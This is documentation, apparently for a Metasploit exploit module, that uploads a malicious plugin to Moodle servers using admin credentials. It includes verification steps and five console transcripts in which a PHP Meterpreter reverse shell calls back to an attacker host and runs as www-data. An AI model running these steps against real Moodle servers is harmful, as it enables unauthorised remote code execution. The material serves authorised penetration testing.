adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
5ea2cf9e5aadc22083cf0bc85b8a2c89fbfa73d1
metasploit-gs/documentation/modules/exploit/multi/http/moodle_admin_shell_upload.md
T

246 lines
8.6 KiB
Markdown
Raw Normal View History

moodle_admin_shell_upload working and minor other fixes
2021-08-29 16:59:44 -04:00
## Vulnerable Application
This module will generate a plugin which can receive a malicious
payload request and upload it to a server running Moodle
provided valid admin credentials are used. Then the payload
is sent for execution, and the plugin uninstalled.
You must have an admin account to exploit this vulnerability.
Successfully tested against 3.6.3, 3.8.0, 3.9.0, 3.10.0, 3.11.2
## Verification Steps
1. Install moodle
1. Start msfconsole
1. Do: `use exploits/multi/http/moodle_admin_shell_upload`
1. Do: `set username [username]`
1. Do: `set password [password]`
1. Do: `run`
1. You should get a shell.
## Options
### Username
Username for an admin user. Default is `admin`
### Password
Password for an admin user
## Scenarios
### Moodle 3.8.0 on Ubuntu 20.04
```
resource (moodle_upload.rb)> use exploits/multi/http/moodle_admin_shell_upload
resource (moodle_upload.rb)> set rhosts 2.2.2.2
rhosts => 2.2.2.2
resource (moodle_upload.rb)> set username admin
username => admin
resource (moodle_upload.rb)> set password Adminadmin1!
password => Adminadmin1!
resource (moodle_upload.rb)> set targeturi /moodle-3.8.0/
targeturi => /moodle-3.8.0/
resource (moodle_upload.rb)> set payload payload/php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
resource (moodle_upload.rb)> set lhost eth0
lhost => eth0
resource (moodle_upload.rb)> exploit
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Exploitable Moodle version 3.8 detected
[*] Authenticating as user: admin
[+] Authentication was successful with user: admin
[*] Getting variables required for upload
[*] Creating plugin named: tqmdaefi
[*] Uploading plugin
[+] Plugin tqmdaefi.zip file successfully uploaded to target!
[*] Attempting to integrate the plugin...
[*] Integrating plugin
[+] Plugin successfully integrated!
[*] Triggering payload
[*] Sending stage (39282 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:56156) at 2021-08-29 16:03:40 -0400
[*] Uninstalling plugin
meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer : moodle
OS : Linux moodle 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 x86_64
Meterpreter : php/linux
```
### Moodle 3.6.3 on Ubuntu 20.04
```
resource (moodle_upload.rb)> use exploits/multi/http/moodle_admin_shell_upload
resource (moodle_upload.rb)> set rhosts 2.2.2.2
rhosts => 2.2.2.2
resource (moodle_upload.rb)> set username admin
username => admin
resource (moodle_upload.rb)> set password Adminadmin1!
password => Adminadmin1!
resource (moodle_upload.rb)> set targeturi /moodle-3.6.3/
targeturi => /moodle-3.6.3/
resource (moodle_upload.rb)> set payload payload/php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
resource (moodle_upload.rb)> set lhost eth0
lhost => eth0
resource (moodle_upload.rb)> exploit
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Exploitable Moodle version 3.6.3 detected
[*] Authenticating as user: admin
[+] Authentication was successful with user: admin
[*] Getting variables required for upload
[*] Creating plugin named: ttvszmjy
[*] Uploading plugin
[+] Plugin ttvszmjy.zip file successfully uploaded to target!
[*] Attempting to integrate the plugin...
[*] Integrating plugin
[+] Plugin successfully integrated!
[*] Triggering payload
[*] Sending stage (39282 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:56158) at 2021-08-29 16:09:49 -0400
[*] Uninstalling plugin
meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer : moodle
OS : Linux moodle 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 x86_64
Meterpreter : php/linux
```
### Moodle 3.9.0 on Ubuntu 20.04
```
resource (moodle_upload.rb)> use exploits/multi/http/moodle_admin_shell_upload
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
resource (moodle_upload.rb)> set rhosts 2.2.2.2
rhosts => 2.2.2.2
resource (moodle_upload.rb)> set username admin
username => admin
resource (moodle_upload.rb)> set password Adminadmin1!
password => Adminadmin1!
resource (moodle_upload.rb)> set targeturi /moodle-3.9.0/
targeturi => /moodle-3.9.0/
resource (moodle_upload.rb)> set payload payload/php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
resource (moodle_upload.rb)> set lhost eth0
lhost => eth0
resource (moodle_upload.rb)> exploit
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Exploitable Moodle version 3.9 detected
[*] Authenticating as user: admin
[+] Authentication was successful with user: admin
[*] Getting variables required for upload
[*] Creating plugin named: jwnsnjof
[*] Uploading plugin
[+] Plugin jwnsnjof.zip file successfully uploaded to target!
[*] Attempting to integrate the plugin...
[*] Integrating plugin
[+] Plugin successfully integrated!
[*] Triggering payload
[*] Sending stage (39282 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:56182) at 2021-08-29 16:47:00 -0400
[*] Uninstalling plugin
meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer : moodle
OS : Linux moodle 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 x86_64
Meterpreter : php/linux
```
### Moodle 3.10.0 on Ubuntu 20.04
```
resource (moodle_upload.rb)> use exploits/multi/http/moodle_admin_shell_upload
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
resource (moodle_upload.rb)> set rhosts 2.2.2.2
rhosts => 2.2.2.2
resource (moodle_upload.rb)> set username admin
username => admin
resource (moodle_upload.rb)> set password Adminadmin1!
password => Adminadmin1!
resource (moodle_upload.rb)> set targeturi /moodle-3.10.0/
targeturi => /moodle-3.10.0/
resource (moodle_upload.rb)> set payload payload/php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
resource (moodle_upload.rb)> set lhost eth0
lhost => eth0
resource (moodle_upload.rb)> exploit
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Exploitable Moodle version 3.10 detected
[*] Authenticating as user: admin
[+] Authentication was successful with user: admin
[*] Getting variables required for upload
[*] Creating plugin named: xstassyj
[*] Uploading plugin
[+] Plugin xstassyj.zip file successfully uploaded to target!
[*] Attempting to integrate the plugin...
[*] Integrating plugin
[+] Plugin successfully integrated!
[*] Triggering payload
[*] Sending stage (39282 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:56186) at 2021-08-29 16:49:52 -0400
[*] Uninstalling plugin
meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer : moodle
OS : Linux moodle 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 x86_64
Meterpreter : php/linux
```
### Moodle 3.11.2 on Ubuntu 20.04
```
resource (moodle_upload.rb)> use exploits/multi/http/moodle_admin_shell_upload
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
resource (moodle_upload.rb)> set rhosts 2.2.2.2
rhosts => 2.2.2.2
resource (moodle_upload.rb)> set username admin
username => admin
resource (moodle_upload.rb)> set password Adminadmin1!
password => Adminadmin1!
resource (moodle_upload.rb)> set targeturi /moodle-3.11.2/
targeturi => /moodle-3.11.2/
resource (moodle_upload.rb)> set payload payload/php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
resource (moodle_upload.rb)> set lhost eth0
lhost => eth0
resource (moodle_upload.rb)> exploit
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Exploitable Moodle version 3.11.2 detected
[*] Authenticating as user: admin
[+] Authentication was successful with user: admin
[*] Getting variables required for upload
[*] Creating plugin named: ksrhyfeq
[*] Uploading plugin
[+] Plugin ksrhyfeq.zip file successfully uploaded to target!
[*] Attempting to integrate the plugin...
[*] Integrating plugin
[+] Plugin successfully integrated!
[*] Triggering payload
[*] Sending stage (39282 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:56190) at 2021-08-29 16:54:03 -0400
[*] Uninstalling plugin
meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer : moodle
OS : Linux moodle 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 x86_64
Meterpreter : php/linux
```
Reference in New Issue Copy Permalink